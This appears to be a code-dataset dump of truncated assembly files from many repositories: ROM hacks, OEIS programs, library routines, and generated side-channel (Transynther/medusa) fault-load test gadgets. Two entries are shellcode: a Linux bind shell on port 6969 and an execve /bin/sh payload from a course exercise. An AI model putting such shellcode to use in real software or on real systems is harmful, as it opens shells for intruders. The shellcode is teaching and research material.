max_stars_repo_path
stringlengths
3
255
max_stars_repo_name
stringlengths
5
116
max_stars_count
int64
0
107k
id
stringlengths
1
7
content
stringlengths
63
1.05M
inverted.asm
Zarby89/z3randomizer
0
209705
; Does tile modification for... the pyramid of power hole ; after Ganon slams into it in bat form? Overworld_DrawPyramidHoleModified: LDA.l InvertedMode : BNE + BRL .originalBehaviour + .invertedBehavior REP #$30 LDX.w #$0440 LDA.w #$0E39 JSL Overworld_DrawPersistentMap16 LDX.w #$04BC LDA.w #$0E3A JSL C...
Transynther/x86/_processed/NONE/_zr_/i7-8650U_0xd2.log_10772_47.asm
ljhsiun2/medusa
9
209706
.global s_prepare_buffers s_prepare_buffers: push %r12 push %r14 push %r15 push %rax push %rbx push %rcx push %rdi push %rdx push %rsi lea addresses_WC_ht+0x5c3d, %rax nop nop nop nop cmp $3285, %rdx mov $0x6162636465666768, %rbx movq %rbx, %xmm2 and $0xffffffffffffffc0, %rax movaps %xmm2, (%rax) nop nop sub $11561, %r...
data/pokemon/dex_entries/shroomish.asm
AtmaBuster/pokeplat-gen2
6
209707
db "MUSHROOM@" ; species name db "If it senses" next "danger, it " next "scatters spores" page "from the top of" next "its head to" next "protect itself.@"
DOS IO_Team_Project/Work/taskTxtGraphics.asm
mdulc928/Computer-Systems
1
209708
<gh_stars>1-10 bits 16 org 0x100 SECTION .text main: mov ax, 0xB800 mov es, ax ; moving directly into a segment register is not allowed mov bx, 332 ; 996 ; offset for approximately the middle of the screen mov ah, 0x0 mov al, 0x1 ...
libsrc/target/rx78/graphics/pixladdr.asm
jpoikela/z88dk
38
209710
<reponame>jpoikela/z88dk ; ;----------- GFX paging ------------- SECTION code_driver PUBLIC pixeladdress ; Entry h = x ; l = y ; Exit: hl = address ; a = pixel number ; Uses: a, bc, de, hl .pixeladdress ; add y-times the nuber of bytes per line (32) ; or just multiply y by 32 and the add ld e,...
tests/listing/sld/cspect_debug/sld_example/include.i.asm
fengjixuchui/sjasmplus
220
209712
<gh_stars>100-1000 MACRO someMacro2 .macro2: someMacro1 jr .skip db CSPECT_EASY+2 ; WPMEM .skip ENDM INCLUDE "../sld_example.i.asm" MMU 7 n, 30, $E000 mmu7p30: docolor %000'101'00 ; green someMacro1 nextreg $56,21 jp mmu6p21 ALIGN $2000 mmu7p31: docolor ...
programs/oeis/130/A130145.asm
karttu/loda
0
209714
; A130145: Number of nonisomorphic orthogonal arrays OA(n,4,2,2)'s when n is not a multiple of 8. ; 1,3,7,15,28,48,79,123,184,268,379,523,709,943,1234,1594,2032,2560,3194,3946,4832,5872,7082,8482,10097 mov $13,$0 mov $15,$0 add $15,1 lpb $15,1 clr $0,13 mov $0,$13 sub $15,1 sub $0,$15 mov $10,$0 mov $12,$0...
Transynther/x86/_processed/US/_st_4k_/i9-9900K_12_0xca.log_21829_550.asm
ljhsiun2/medusa
9
209715
<gh_stars>1-10 .global s_prepare_buffers s_prepare_buffers: push %r12 push %r14 push %rbp push %rbx push %rcx push %rdi push %rdx push %rsi lea addresses_normal_ht+0x5a5f, %rsi nop nop nop xor %rbp, %rbp movw $0x6162, (%rsi) nop nop nop add %rsi, %rsi lea addresses_D_ht+0xb1cc, %rsi lea addresses_WT_ht+0x1565f, %rdi no...
asm/ooe_allow_separate_kalidus_entrance_unlocks.asm
Iemnur/DSVEdit
70
209716
<reponame>Iemnur/DSVEdit<filename>asm/ooe_allow_separate_kalidus_entrance_unlocks.asm .nds .relativeinclude on .erroronwarning on ; This patch allows the front and back entrances of Kalidus to be unlocked separately from one another. ; Normally you'd need to unlock the front entrance first, then the back entrance. ; T...
Transynther/x86/_processed/NONE/_zr_/i7-7700_9_0xca.log_13492_1670.asm
ljhsiun2/medusa
9
209717
.global s_prepare_buffers s_prepare_buffers: push %r13 push %r15 push %r8 push %rbx push %rcx push %rdi push %rsi lea addresses_UC_ht+0x1da5f, %rdi nop nop nop nop cmp $37565, %rbx movups (%rdi), %xmm2 vpextrq $0, %xmm2, %rcx nop xor $60924, %r15 lea addresses_D_ht+0x1651b, %rsi lea addresses_D_ht+0x1240b, %rdi clflush...
programs/oeis/285/A285998.asm
neoneye/loda
22
209720
<reponame>neoneye/loda<gh_stars>10-100 ; A285998: a(n) = Sum_{k=0..floor(n/2)} (n-k)*(k+1). ; 1,4,7,16,22,40,50,80,95,140,161,224,252,336,372,480,525,660,715,880,946,1144,1222,1456,1547,1820,1925,2240,2360,2720,2856,3264,3417,3876,4047,4560,4750,5320,5530,6160,6391,7084,7337,8096,8372,9200,9500,10400,10725 add $0,2 lp...
linux/x86/bind_shell/bind_shell.asm
a-rey/0xDEADBEEF
0
209722
<reponame>a-rey/0xDEADBEEF ; non-NULL shellcode running /bin/sh and listening on port 6969 ; -> change the port using Python: ; $ python -c "import socket; print(hex(socket.htons(PORT)))" ; -> get a list of sys_socket calls ; $ grep SYS_ /usr/include/linux/net.h global _start section .text _start: ; ~~~...
programs/oeis/018/A018240.asm
jmorken/loda
1
209725
<reponame>jmorken/loda ; A018240: Number of rational knots (or two-bridge knots) with n crossings (up to mirroring). ; 1,1,2,3,7,12,24,45,91,176,352,693,1387,2752,5504,10965,21931,43776,87552,174933,349867,699392,1398784,2796885,5593771,11186176,22372352,44741973,89483947,178962432,357924864,715838805,1431677611,286333...
oeis/041/A041149.asm
neoneye/loda-programs
11
209726
; A041149: Denominators of continued fraction convergents to sqrt(84). ; Submitted by <NAME> ; 1,6,109,660,11989,72594,1318681,7984680,145042921,878242206,15953402629,96598657980,1754729246269,10624974135594,193004263686961,1168650556257360,21228714276319441,128540936214174006,2334965566131451549,14138334333002883300,2...
libsrc/_DEVELOPMENT/math/float/am9511/asm/z80/am32_hexpop.asm
dikdom/z88dk
1
209727
<filename>libsrc/_DEVELOPMENT/math/float/am9511/asm/z80/am32_hexpop.asm ; ; Copyright (c) 2020 <NAME> ; ; This Source Code Form is subject to the terms of the Mozilla Public ; License, v. 2.0. If a copy of the MPL was not distributed with this ; file, You can obtain one at http://mozilla.org/MPL/2.0/. ; ; feilipu,...
Transynther/x86/_processed/AVXALIGN/_zr_/i7-7700_9_0x48_notsx.log_21829_1439.asm
ljhsiun2/medusa
9
209728
<gh_stars>1-10 .global s_prepare_buffers s_prepare_buffers: push %r11 push %r13 push %r15 push %r8 push %r9 push %rax push %rbp push %rcx push %rdi push %rsi lea addresses_normal_ht+0x5765, %r11 clflush (%r11) nop nop nop sub $58262, %r15 movups (%r11), %xmm6 vpextrq $0, %xmm6, %rax nop nop nop nop cmp %r8, %r8 lea add...
8051 ASM/Lab5_6.asm
clbx/CS333
1
209729
<gh_stars>1-10 ;This technically doesn't follow the steps of the lab ;But i think they're stupid and don't make much sense ;This seems like a much better way to handle it. That ;doesn't include sitting around with a floating stack ;pointer up our ass MOV SP,#4FH ;Move the stack pointer down the memory map. Keeps i...
programs/oeis/002/A002412.asm
karttu/loda
1
209730
<gh_stars>1-10 ; A002412: Hexagonal pyramidal numbers, or greengrocer's numbers. ; 0,1,7,22,50,95,161,252,372,525,715,946,1222,1547,1925,2360,2856,3417,4047,4750,5530,6391,7337,8372,9500,10725,12051,13482,15022,16675,18445,20336,22352,24497,26775,29190,31746,34447,37297,40300,43460,46781,50267,53922,57750,61755,65941,7...
programs/oeis/184/A184749.asm
karttu/loda
1
209731
<reponame>karttu/loda ; A184749: floor(n*s+h-h*s), where s=(7+sqrt(5))/4, h=-1/2; complement of A184748. ; 2,5,7,9,12,14,16,19,21,23,26,28,30,32,35,37,39,42,44,46,49,51,53,56,58,60,62,65,67,69,72,74,76,79,81,83,86,88,90,93,95,97,99,102,104,106,109,111,113,116,118,120,123,125,127,129,132,134,136,139,141,143,146,148,150,...
Main.asm
jhadjar/stepper
0
209733
;*********************************************************************************** ;* Description: * ;* TEC 585 Project00: Stepper Motor Control using PIC1684A * ;* A ULN2003 (7 Darlington Array) is used as an interface. ...
texmap/tmap_flt.asm
osgcc/descent-pc
3
209734
<filename>texmap/tmap_flt.asm ;THE COMPUTER CODE CONTAINED HEREIN IS THE SOLE PROPERTY OF PARALLAX ;SOFTWARE CORPORATION ("PARALLAX"). PARALLAX, IN DISTRIBUTING THE CODE TO ;END-USERS, AND SUBJECT TO ALL OF THE TERMS AND CONDITIONS HEREIN, GRANTS A ;ROYALTY-FREE, PERPETUAL LICENSE TO SUCH END-USERS FOR USE BY SUCH ...
SLAE_assignments/assignment6/execve.nasm
RomainLanglois/SLAE_x86
0
209735
<filename>SLAE_assignments/assignment6/execve.nasm ;Shellcode size : 23 bytes global _start _start: xor eax, eax ;Initialize eax to NULL push eax ;Push a NULL Byte on the stack push 0x68732f2f push 0x6e69622f ;Push /bin/sh on the stack mov ebx, esp ;Intialize ...
Libraries/stack.asm
LeonardoSanBenitez/Assembly-exercises
0
209736
.eqv STACK_MAX_SIZE 80 # 20 integers #=========================================== # Alloc macro .macro ALLOC_STACK (%name) .data .align 2 %name: .space 4 # size .space STACK_MAX_SIZE .end_macro .text #=========================================== # void stackInit (*stack) stackInit: sw $zero, 0($a0) # ...
programs/oeis/106/A106476.asm
jmorken/loda
1
209738
; A106476: Sequence array of Euler phi function. ; 1,1,1,2,1,1,2,2,1,1,4,2,2,1,1,2,4,2,2,1,1,6,2,4,2,2,1,1,4,6,2,4,2,2,1,1,6,4,6,2,4,2,2,1,1,4,6,4,6,2,4,2,2,1,1,10,4,6,4,6,2,4,2,2,1,1,4,10,4,6,4,6,2,4,2,2,1,1,12,4,10,4,6,4,6,2,4,2,2,1,1,6,12,4,10,4,6,4,6,2,4,2 cal $0,25669 ; Exponent of 7 (value of i) in n-th number o...
oeis/268/A268555.asm
neoneye/loda-programs
11
209740
<filename>oeis/268/A268555.asm ; A268555: Diagonal of the rational function of six variables 1/((1 - w - u v - u v w) * (1 - z - x y)). ; Submitted by <NAME> ; 1,6,78,1260,22470,424116,8305836,166929048,3419932230,71109813060,1496053026468,31777397077608,680354749147164,14664155597771400,317877850826299800,692481555527...
Transynther/x86/_processed/AVXALIGN/_zr_/i9-9900K_12_0xa0_notsx.log_16835_1857.asm
ljhsiun2/medusa
9
209741
.global s_prepare_buffers s_prepare_buffers: push %r13 push %r14 push %r15 push %r8 push %rax push %rcx push %rdi push %rdx push %rsi lea addresses_WC_ht+0x1d4b0, %rcx nop nop nop nop nop xor $33580, %rdx mov (%rcx), %r8 sub $44758, %rcx lea addresses_D_ht+0x177e8, %r14 clflush (%r14) nop nop nop xor $16474, %r15 mov (...
Projects/PJZ2/Framework/Depack/doynamite68k_Depack.asm
jonathanbennett73/amiga-pjz-planet-disco-balls
21
209742
<gh_stars>10-100 ;------------------------------------------------------------------------------- ;Lempel-Ziv decompressor by Johan "Doynax" Forsl�f. Call doynamitedepack to decode the entire buffer in ;one go. ; ;This is a fork of the 68000 depacker by <NAME> (Axis/Oxyron) ;for the 6502 Doynamite format, except with t...
oeis/019/A019767.asm
neoneye/loda-programs
11
209743
; A019767: Decimal expansion of 2*e/11. ; 4,9,4,2,3,3,0,5,9,7,1,9,8,2,6,4,0,6,4,2,9,1,4,3,1,7,6,6,0,9,5,7,4,9,9,9,5,9,2,2,2,6,7,4,4,3,0,9,0,8,3,5,5,9,0,8,4,9,0,3,2,0,5,0,4,0,7,4,1,2,0,5,5,1,8,8,2,6,8,3,5,3,7,6,6,1,4,9,4,1,5,5,0,0,3,0,2,5,9,5 add $0,1 mov $2,1 mov $3,$0 mul $3,5 lpb $3 mul $2,$3 add $1,$2 cmp $4,...
libsrc/z80_crt0s/crt0_long/l_long_bool.asm
meesokim/z88dk
0
209744
<reponame>meesokim/z88dk<gh_stars>0 ; Z88 Small C+ Run Time Library ; Long functions ; PUBLIC l_long_bool ; HL = !!HL .l_long_bool ld a,h or l or e or d ret z ld hl,1 ld e,h ld d,h ret
PRIDE_64_128_AVR/Pride_Sce1_CBC/Pride_Sce1_CBC.asm
FreeDisciplina/BlockCiphersOnAVR
12
209745
<reponame>FreeDisciplina/BlockCiphersOnAVR /* * Pride_Sce1_CBC.asm * * Created: 2015/9/15 9:46:19 * Author: LuoPeng * * Time : 2015.9.25 * 1. Use 16 bytes to store master keys because they can not be changed even after the key schedule. */ .EQU ONE_BLOCK_BYTE = 8 ; one block has 8 bytes .EQU PTEXT_N...
src/torus.asm
BlockoS/up-18
3
209746
TORUS_VDC_CONFIG = (VDC_CR_BG_ENABLE | VDC_CR_SPR_ENABLE | VDC_CR_VBLANK_ENABLE | VDC_CR_HBLANK_ENABLE) TORUS_VRAM_ADDR = $4400 LOGO_VRAM_ADDR = $2100 SATB_ADDR = $7e00 .zp torus.index .ds 1 torus.ptr .ds 2 .code reverse_xor: .db $ff,$7f,$bf,$3f,$df,$5f,$9f,$1f,$ef,$6f,$af,$2f,$cf,$4f,$8f,$0f .db $f7,...
compsci courses/CPSC355 - Computing Machinery/assignments/as2/assign2a.asm
q-omar/UofC
1
209748
<reponame>q-omar/UofC<gh_stars>1-10 //CPSC 355 //<NAME> //ID 10086638 //Assignment 2 //The following ARM assembly code takes two hexadecimal numbers as input and performs a multiplication via //looping and shifting through bits. The initial inputs are printed in hexadecimal and decimal format and //the final product i...
oeis/115/A115007.asm
neoneye/loda-programs
11
209749
; A115007: Row 3 of array in A114999. ; Submitted by <NAME>(s3) ; 0,6,16,31,50,75,103,137,175,218,265,318,374,436,502,573,648,729,813,903,997,1096,1199,1308,1420,1538,1660,1787,1918,2055,2195,2341,2491,2646,2805,2970,3138,3312,3490,3673,3860,4053,4249,4451,4657,4868,5083,5304,5528 mov $1,14 mul $1,$0 add $0,1 mul $0,2...
src/display.asm
ploe/stix
1
209750
<reponame>ploe/stix<filename>src/display.asm ; hardware.inc INCLUDE "hardware.inc" ; project libs INCLUDE "display.inc" INCLUDE "kernel.inc" SECTION "Display HRAM Data", HRAM[$FF80] ; the built-in DMA transfer locks up ROM, and so needs putting in HRAM Display_DmaTransfer:: SECTION "Display Code", ROM0 ; Constants ...
boot/globals/gdt.asm
ByRussX/CrindalOS
3
209751
<reponame>ByRussX/CrindalOS<filename>boot/globals/gdt.asm<gh_stars>1-10 ;Defines GDT and GDT descriptor for switching to 32 bits protected mode ;16 bits Real Mode [bits 16] gdt_start: gdt_null_: dq 0x0 gdt_code_: dw 0xffff dw 0x0 db 0x0 db 10011010b db 11001111b db 0x0 gdt_data_: dw 0xffff dw 0x0 db 0x0 ...
oeis/311/A311593.asm
neoneye/loda-programs
11
209752
<filename>oeis/311/A311593.asm ; A311593: Coordination sequence Gal.6.192.6 where G.u.t.v denotes the coordination sequence for a vertex of type v in tiling number t in the Galebach list of u-uniform tilings. ; Submitted by <NAME> ; 1,4,8,12,18,22,26,30,36,40,44,48,52,56,60,66,70,74,78,84,88,92,96,100,104,108,114,118,1...
libsrc/_DEVELOPMENT/string/c/sdcc_iy/memccpy.asm
meesokim/z88dk
0
209753
; void *memccpy(void * restrict s1, const void * restrict s2, int c, size_t n) SECTION code_string PUBLIC _memccpy EXTERN l0_memccpy_callee _memccpy: pop af pop de pop hl exx pop bc exx pop bc push bc push bc push hl push de push af jp l0_memccpy_callee
programs/oeis/259/A259059.asm
karttu/loda
1
209754
<filename>programs/oeis/259/A259059.asm<gh_stars>1-10 ; A259059: One half of numbers representable in at least two different ways as sums of four distinct nonvanishing squares. See A259058 for these numbers and their representations. ; 227,265,307,353,403,457,515,577,643,713,787,865,947,1033,1123,1217,1315,1417,1523,16...
GaidenMagic/MagicUMCommandUnhover.asm
HyperGammaSpaces/FE8GaidenMagic
1
209756
.thumb .macro blh to, reg=r3 ldr \reg, =\to mov lr, \reg .short 0xf800 .endm .equ HideMoveRangeGraphics, 0x0801DACC push {r3, lr} ldr r3, =0x0203F082 @marking this as not using spell menu mov r0, #0x0 strb r0, [r3] blh HideMoveRangeGraphics mov r0, #0x0 pop {r3} pop {r1} bx r1
programs/oeis/057/A057526.asm
jmorken/loda
1
209757
; A057526: Number of applications of f to reduce n to 1, where f(k) is the integer among k/2,(k-1)/4, (k+1)/4. ; 0,1,1,2,1,2,2,3,2,2,2,3,2,3,3,4,3,3,2,3,2,3,3,4,3,3,3,4,3,4,4,5,4,4,3,4,3,3,3,4,3,3,3,4,3,4,4,5,4,4,3,4,3,4,4,5,4,4,4,5,4,5,5,6,5,5,4,5,4,4,4,5,4,4,3,4,3,4,4,5,4,4,3,4,3,4,4,5,4,4,4,5,4,5,5,6,5,5,4,5,4,4,4,5...
Lab_8/Task_2.a51
SSaxena2001/8051_Programs
0
209759
<gh_stars>0 ;Write a program for the 8051 to receive bytes of data serially ;and put them in P1, set the baud rate at 4800, 8-bit data and 1 stop bit. ORG 0000H MOV TMOD,#20H MOV TH1,#0FDH MOV SCON,#50H SETB TR1 HERE:JNB RI,HERE MOV A,SBUF MOV P1,A CLR RI SJMP HERE END ;Deeptimaan Banerjee
Transynther/x86/_processed/US/_zr_/i7-7700_9_0x48_notsx.log_4412_605.asm
ljhsiun2/medusa
9
209760
<filename>Transynther/x86/_processed/US/_zr_/i7-7700_9_0x48_notsx.log_4412_605.asm .global s_prepare_buffers s_prepare_buffers: push %r13 push %r14 push %r15 push %r8 push %rbx push %rcx push %rdi push %rsi lea addresses_UC_ht+0x1b6ed, %rsi clflush (%rsi) nop nop nop nop mfence mov (%rsi), %rbx nop inc %r13 lea address...
programs/oeis/052/A052952.asm
karttu/loda
1
209761
; A052952: a(n) = Fibonacci(n+2) - (1-(-1)^n)/2. ; 1,1,3,4,8,12,21,33,55,88,144,232,377,609,987,1596,2584,4180,6765,10945,17711,28656,46368,75024,121393,196417,317811,514228,832040,1346268,2178309,3524577,5702887,9227464,14930352,24157816,39088169,63245985,102334155,165580140,267914296,433494436,701408733,1134903169,18...
oeis/302/A302404.asm
neoneye/loda-programs
11
209762
; A302404: Total domination number of the n-Moebius ladder. ; Submitted by <NAME> ; 0,2,2,2,3,4,4,6,6,6,7,8,8,10,10,10,11,12,12,14,14,14,15,16,16,18,18,18,19,20,20,22,22,22,23,24,24,26,26,26,27,28,28,30,30,30,31,32,32,34,34,34,35,36,36,38,38,38,39,40,40,42,42,42,43,44,44,46,46,46,47,48,48,50,50,50,51,52,52,54,54,54,55,...
Transynther/x86/_processed/AVXALIGN/_zr_/i9-9900K_12_0xa0.log_21829_644.asm
ljhsiun2/medusa
9
209763
.global s_prepare_buffers s_prepare_buffers: push %r12 push %r8 push %rax push %rsi lea addresses_UC_ht+0x754c, %rax nop nop nop cmp $766, %r8 vmovups (%rax), %ymm1 vextracti128 $1, %ymm1, %xmm1 vpextrq $0, %xmm1, %rsi nop nop nop nop add %r12, %r12 pop %rsi pop %rax pop %r8 pop %r12 ret .global s_faulty_load s_fa...
8088/60/60.asm
reenigne/reenigne
92
209764
<reponame>reenigne/reenigne %macro test 1 lahf mov [cs:store+0x16],ah mov ax,0x0022 mov ds,ax mov ax,0x4466 mov es,ax mov ax,0x88aa mov ss,ax mov ax,0x0123 mov bx,0x4567 mov cx,0x89ab mov dx,0xcdef mov si,0x1133 mov di,0x5577 mov sp,0x99bb mov bp,0xddff db %1,2 int 0x65 mov [cs...
DevSound_Macros.asm
DevEd2/HokeyPokey-GB
0
209765
; ================================================================ ; DevSound macros ; ================================================================ if !def(incDSMacros) incDSMacros set 1 Instrument: macro db \1 dw \2,\3,\4,\5 endm Drum: macro db SetInstrument,\1,fix,\2 endm endc
Transynther/x86/_processed/NC/_zr_/i9-9900K_12_0xa0_notsx.log_21829_2000.asm
ljhsiun2/medusa
9
209766
<gh_stars>1-10 .global s_prepare_buffers s_prepare_buffers: push %r11 push %r12 push %r15 push %rax push %rcx push %rdi push %rsi lea addresses_UC_ht+0x6aa4, %rsi nop add $55209, %rdi mov $0x6162636465666768, %r15 movq %r15, %xmm0 movups %xmm0, (%rsi) and $7743, %r11 lea addresses_WC_ht+0x1a4a4, %rcx nop nop nop cmp %r...
corner32/sogliatura_18.nasm
tassoneroberto/harris-corner-detection
0
209767
%include "init.nasm" section .data f equ 8 ; matrice f n equ 12 ; rows m equ 16 ; cols s equ 20 ; soglia dim equ 4 ; dimensione ogni locazione section .bss section .text global sogliatura sogliatura: go mov ecx,[ebp+n]; imul ecx,[ebp+m]; mov edx,[ebp+s]; mov esi, [ebp+f] ; indirizzo di f mov ebx, 0 ....
Library/Gadgets/UI/uiBatteryIndicator.asm
steakknife/pcgeos
504
209769
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Copyright (c) Geoworks 1994 -- All Rights Reserved PROJECT: Interface Gadgets MODULE: Battery Indicator Gadget FILE: uiBatteryIndicator.asm AUTHOR: <NAME>, Sep 22, 1994 ROUTINES: Name Description ---- ----------- ...
data/battle/effect_command_pointers.asm
pokeachromicdevs/pokeoctober
1
209770
; battle commands are defined in engine/battle/effect_commands.asm dw 0 ; padding BattleCommandPointers: ; entries correspond to macros/scripts/battle_commands.asm dw BattleCommand_CheckTurn dw BattleCommand_CheckObedience dw BattleCommand_UsedMoveText dw BattleCommand_DoTurn dw BattleCommand_Critical dw Battl...
playground/Screen.asm
quajak/XSharp
0
209771
; namespace DebugStub ; var DebugWaitMsg = 'Waiting for debugger connection...' ; //! %ifndef Exclude_Memory_Based_Console %ifndef Exclude_Memory_Based_Console ; const VidBase = $B8000 DebugStub_Const_VidBase equ 753664 ; function Cls { DebugStub_Cls: ; ESI = #VidBase Mov ESI, DebugStub_Const_VidBase ; En...
libsrc/stdio/ansi/x1/f_ansi_char.asm
jpoikela/z88dk
0
209772
; ; ANSI Video handling for the Sharp X1 ; <NAME> (for X1s.org) - 24/10/2013 ; <NAME> 10/2013 ; ; set it up with: ; .__console_w = max columns ; .__console_h = max rows ; ; Display a char in location (__console_y),(__console_x) ; A=char to display ; ; ; $Id: f_ansi_char.asm,v 1.7 2016-07-20 05:45:02 stefano Exp $ ; ...
conf/S19_TIM_sample.asm
liffiton/256asm
0
209773
# Example TIM ISA code again: add $1 $2 $3 addi $4 $5 6 beq $0 $0 again andi $1 $7 0b101010 sb $1 $2 $0 lb $3 $5 $7 slt $1 $3 $0
ch10/Repeat.asm
William0Friend/my_masm
0
209774
<filename>ch10/Repeat.asm ; Repeat Block Examples (Repeat.asm) ; This program demonstrates the REPEAT, FOR, ; FORC, and WHILE directives. INCLUDE Irvine32.inc INCLUDE Macros.inc COURSE STRUCT Number BYTE 9 DUP(?) Credits BYTE ? COURSE ENDS ; A semester contains an array of courses. SEMEST...
text/maps/celadon_mansion_3f.asm
adhi-thirumala/EvoYellow
16
209775
<gh_stars>10-100 _ProgrammerText:: text "Me? I'm the" line "programmer!" done _ProgrammerText2:: text "Me? I'm the" line "programmer!" para "What a surprise!" line "I never expected" cont "anyone to fill a" cont "#DEX." done _GraphicArtistText:: text "I'm the graphic" line "artist!" cont "I drew you!" ...
src/asm/test_jcond/jlt_jgt.asm
Petersoj/ECE3710Projects
3
209776
MOVIL r8 48 # frame pointer = 48 .main MOVIL r0 5 # x = 5 MOVIL r1 4 # y = 4 CMPI r0 10 # x < 10 MOVIL r9 7 # .L2 JGT r9 MOVIL r1 3 # y = 3 .L2 CMPI r1 4 # y > 4 MOVIL r10 11 # .L3 JLT r10 MOVIL r0 4 # x would be 4, but this shouldn't e...
oeis/204/A204028.asm
neoneye/loda-programs
11
209777
<reponame>neoneye/loda-programs ; A204028: Symmetric matrix based on f(i,j)=min(3i-2,3j-2), by antidiagonals. ; Submitted by <NAME>(s4) ; 1,1,1,1,4,1,1,4,4,1,1,4,7,4,1,1,4,7,7,4,1,1,4,7,10,7,4,1,1,4,7,10,10,7,4,1,1,4,7,10,13,10,7,4,1,1,4,7,10,13,13,10,7,4,1,1,4,7,10,13,16,13,10,7,4,1,1,4,7,10,13,16,16,13,10,7,4,1,1,4,7...
oeis/100/A100188.asm
neoneye/loda-programs
11
209778
<filename>oeis/100/A100188.asm<gh_stars>10-100 ; A100188: Polar structured meta-anti-diamond numbers, the n-th number from a polar structured n-gonal anti-diamond number sequence. ; 1,6,27,84,205,426,791,1352,2169,3310,4851,6876,9477,12754,16815,21776,27761,34902,43339,53220,64701,77946,93127,110424,130025,152126,17693...
engine/battle/read_trainer_dvs.asm
Dev727/ancientplatinum
28
209779
GetTrainerDVs: ; Return the DVs of wOtherTrainerClass in bc push hl ld a, [wOtherTrainerClass] dec a ld c, a ld b, 0 ld hl, TrainerClassDVs add hl, bc add hl, bc ld a, [hli] ld b, a ld c, [hl] pop hl ret INCLUDE "data/trainers/dvs.asm"
src/startanywhere.asm
RebelusQuo/sm_randomizer_rom
0
209780
<filename>src/startanywhere.asm<gh_stars>0 ; ; Patches to support starting at any given location in the game ; by injecting a save station at X/Y coordinates in the specified room. ; ; Requires adding a new save station with ID: 7 for the correct region in the save station table as well. ; !savestation_id = $0...
Transynther/x86/_processed/NONE/_xt_sm_/i7-8650U_0xd2_notsx.log_2_1480.asm
ljhsiun2/medusa
9
209781
.global s_prepare_buffers s_prepare_buffers: push %r14 push %r15 push %r9 push %rax push %rbx push %rcx push %rdi push %rsi lea addresses_A_ht+0x4e34, %rbx clflush (%rbx) nop nop nop nop nop cmp %r14, %r14 movb $0x61, (%rbx) nop nop nop nop nop inc %rdi lea addresses_normal_ht+0x2760, %r9 nop sub %rcx, %rcx mov $0x6162...
example_programs/p3.asm
debemdeboas/virtual-machine
2
209782
; GIVEN `N` (INT) AT POSITION `M` IN MEMORY: ; IF N < 0: RET -1, STOP ; ELSE CALCULATE THE FACTORIAL OF N (N!) LDI R0, 6 ; N = 6 STD [47], R0 ; M = 47 LDI R0, 0 ; MAIN PROGRAM LDD R0, [47] LDI R1, -1 LDI R7, 30 ; OUTPUT ADDRESS JMPIL R7, R0 ; END THE PROGRAM IF R0 < 0 ; R0 = 0, RETURN 1 LDI R1, 1 JMPIE R7, R0 ; ; ...
cards/bn6/ModCards/137-A010 Heavy.asm
RockmanEXEZone/MMBN-Mod-Card-Kit
10
209783
.include "defaults_mod.asm" table_file_jp equ "exe6-utf8.tbl" table_file_en equ "bn6-utf8.tbl" game_code_len equ 3 game_code equ 0x4252354A // BR5J game_code_2 equ 0x42523545 // BR5E game_code_3 equ 0x42523550 // BR5P card_type equ 1 card_id equ 10 card_no equ "010" card_sub equ "Mod Card 010" card_sub_x ...
programs/oeis/313/A313887.asm
neoneye/loda
22
209784
; A313887: Coordination sequence Gal.6.331.2 where G.u.t.v denotes the coordination sequence for a vertex of type v in tiling number t in the Galebach list of u-uniform tilings. ; 1,5,10,16,21,27,31,37,42,48,53,58,63,68,74,79,85,89,95,100,106,111,116,121,126,132,137,143,147,153,158,164,169,174,179,184,190,195,201,205,2...
libsrc/video/tms9918/stdio/generic_console/tms9918_text_xypos.asm
jpoikela/z88dk
0
209785
<reponame>jpoikela/z88dk SECTION code_clib PUBLIC __tms9918_text_xypos EXTERN __console_w ; Entry: b = row, c = column __tms9918_text_xypos: ld de,(__console_w) ld d,0 ld hl,0 and a sbc hl,de inc b xypos_1: ...
Appendix E - Microcontroller Code/Redundant/Buffers v4.asm
liwenyip/adhoc
0
209786
;************************************************************************* ; SOFTWARE BUFFERS MODULE ; ; Version 0.10 ; 17/07/2005 ; ; <NAME> ; Ad Hoc Radio Networking Research Project ; School Of Engineering ; James Cook University ; ; ; The RAM allocated for each buffer must not overlap two RAM banks. This allows ; ...
oeis/156/A156273.asm
neoneye/loda-programs
11
209787
<gh_stars>10-100 ; A156273: a(n) = 9^n*Catalan(n). ; Submitted by <NAME>(s1) ; 1,9,162,3645,91854,2480058,70150212,2051893701,61556811030,1883638417518,58564030799196,1844766970174674,58748732742485772,1888352123865614100,61182608813245896840,1996082612532147384405,65518476340761072970470,2162109719245115408025510,7169...
programs/oeis/283/A283750.asm
neoneye/loda
22
209789
<reponame>neoneye/loda<gh_stars>10-100 ; A283750: a(n) = n^2 XOR (n + 1)^2. ; Coded manually 2021-03-30 by <NAME>, https://github.com/neoneye ; 1,5,13,25,9,61,21,113,17,53,29,233,57,109,37,481,33,101,45,249,41,93,1013,81,49,213,125,457,89,205,69,1985,65,197,77,473,73,253,85,945,209,117,477,169,121,4013,229,417,97,165,1...
libsrc/_DEVELOPMENT/math/float/math48/c/sdcc_ix/cm48_sdccix_rint_fastcall.asm
meesokim/z88dk
0
209790
<reponame>meesokim/z88dk ; float rint(float x) __z88dk_fastcall SECTION code_fp_math48 PUBLIC cm48_sdccix_rint_fastcall EXTERN cm48_sdccixp_dx2m48, am48_rint, cm48_sdccixp_m482d cm48_sdccix_rint_fastcall: call cm48_sdccixp_dx2m48 call am48_rint jp cm48_sdccixp_m482d
Kernel/interruptions/interrupts.asm
camilaDiToro/Kernel-Pure64
0
209792
GLOBAL _cli GLOBAL _sti GLOBAL picMasterMask GLOBAL picSlaveMask GLOBAL haltcpu GLOBAL _hlt GLOBAL _irq00Handler GLOBAL _irq01Handler GLOBAL _irq02Handler GLOBAL _irq03Handler GLOBAL _irq04Handler GLOBAL _irq05Handler GLOBAL _exception0Handler GLOBAL _exception6Handler GLOBAL _sysCallHandler EXTERN irqDispatcher EX...
Transynther/x86/_processed/US/_zr_/i7-8650U_0xd2.log_21829_1357.asm
ljhsiun2/medusa
9
209793
<reponame>ljhsiun2/medusa<gh_stars>1-10 .global s_prepare_buffers s_prepare_buffers: push %r10 push %r11 push %r14 push %r8 push %rbp push %rcx push %rdi push %rsi lea addresses_D_ht+0x4017, %r8 nop nop nop nop cmp $27091, %rbp movb (%r8), %r14b nop nop cmp %r11, %r11 lea addresses_normal_ht+0x8fd7, %rdi nop inc %rbp a...
programs/oeis/031/A031376.asm
neoneye/loda
22
209794
